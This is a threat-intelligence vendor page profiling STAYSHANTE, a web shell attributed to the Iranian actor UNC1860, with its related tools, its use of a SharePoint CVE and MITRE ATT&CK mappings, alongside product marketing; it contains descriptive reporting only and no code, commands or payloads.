Skip to main content
Live Webinar with SANS (June 25)— Agentic CTI Automation for Fun & ProfitRegister Free
Mallory
Back to malware
MalwareUsed by 1 actor

STAYSHANTE

STAYSHANTE is a web shell used by the Iranian state-sponsored threat actor UNC1860, which Mandiant assesses is likely affiliated with Iran’s Ministry of Intelligence and Security (MOIS). It is deployed after initial access is obtained, typically following opportunistic exploitation of vulnerable internet-facing systems, and has been associated with intrusions targeting high-priority Middle Eastern networks, especially government and telecommunications organizations. Reporting also links STAYSHANTE indicators to activity affecting Israeli entities across sectors including managed service providers, local governments, and academia.

STAYSHANTE is part of UNC1860’s post-exploitation toolchain and is described as being installed under names masquerading as Windows server files or dependencies. It is controlled by the VIROGREEN custom framework, which is also used to exploit vulnerable SharePoint servers via CVE-2019-0604 and to manage post-exploitation payloads. UNC1860 commonly deploys STAYSHANTE alongside the SASHEYAWAY dropper/web-shell-related tooling, and these components are used to facilitate follow-on deployment of additional implants and passive backdoors such as TEMPLEDOOR and FACEFACE. Across the reporting, STAYSHANTE is consistently characterized as a web shell within UNC1860’s broader arsenal of more than 30 custom tools used to establish footholds and support persistent access.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
UNC1860

Web shells like STAYSHANTE and SASHEYAWAY are frequently deployed after initial access is achieved.

via contagiodump blogcontagiodump.blogspot.com
MITRE ATT&CK

Techniques & procedures

3 distinct techniques documented for this family, organized by ATT&CK tactic.

Reconnaissance

1 technique
T1595Active ScanningEvidence1

"Its job is merely to gain that initial foothold, primarily by scanning for vulnerabilities in public-facing assets at targeted organizations"

Persistence

1 technique
T1505.003Web ShellEvidence2

Web shells like STAYSHANTE and SASHEYAWAY are frequently deployed after initial access is achieved. These shells enable further persistence by deploying full passive backdoors, such as TEMPLEDOOR and FACEFACE, which can execute commands, transfer files, and interact with system services.

Command and Control

1 technique
T1105Ingress Tool TransferEvidence1

"Stayshante, Sasheyaway, and tools like it provide its first toe in the water, and can be used to download more substantial backdoors"

ACTIVITY FEED

Recent activity

4 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

4 SOURCESView more in app
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution1

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping3

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.